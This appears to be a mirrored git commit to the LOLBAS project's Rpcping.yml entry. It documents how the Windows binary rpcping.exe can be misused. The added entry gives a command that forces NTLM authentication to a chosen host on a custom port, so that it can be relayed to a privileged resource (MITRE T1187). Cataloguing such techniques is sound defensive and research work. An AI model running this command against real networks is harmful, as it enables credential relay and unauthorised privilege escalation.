mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Update Rpcping.yml
This commit is contained in:
parent
3b848e6121
commit
27b1f9bfb1
@ -12,6 +12,14 @@ Commands:
|
||||
MitreID: T1003
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM
|
||||
Description: Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).
|
||||
Usecase: Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port
|
||||
Category: Credentials
|
||||
Privileges: User
|
||||
MitreID: T1187
|
||||
MitreLink: https://attack.mitre.org/techniques/T1187/
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rpcping.exe
|
||||
- Path: C:\Windows\SysWOW64\rpcping.exe
|
||||
@ -23,9 +31,12 @@ Resources:
|
||||
- Link: https://github.com/vysec/RedTips
|
||||
- Link: https://twitter.com/vysecurity/status/974806438316072960
|
||||
- Link: https://twitter.com/vysecurity/status/873181705024266241
|
||||
- Link: https://twitter.com/splinter_code/status/1421144623678988298
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
- Person: Vincent Yiu
|
||||
Handle: '@vysecurity'
|
||||
---
|
||||
- Person: Antonio Cocomazzi
|
||||
Handle: '@splinter_code'
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user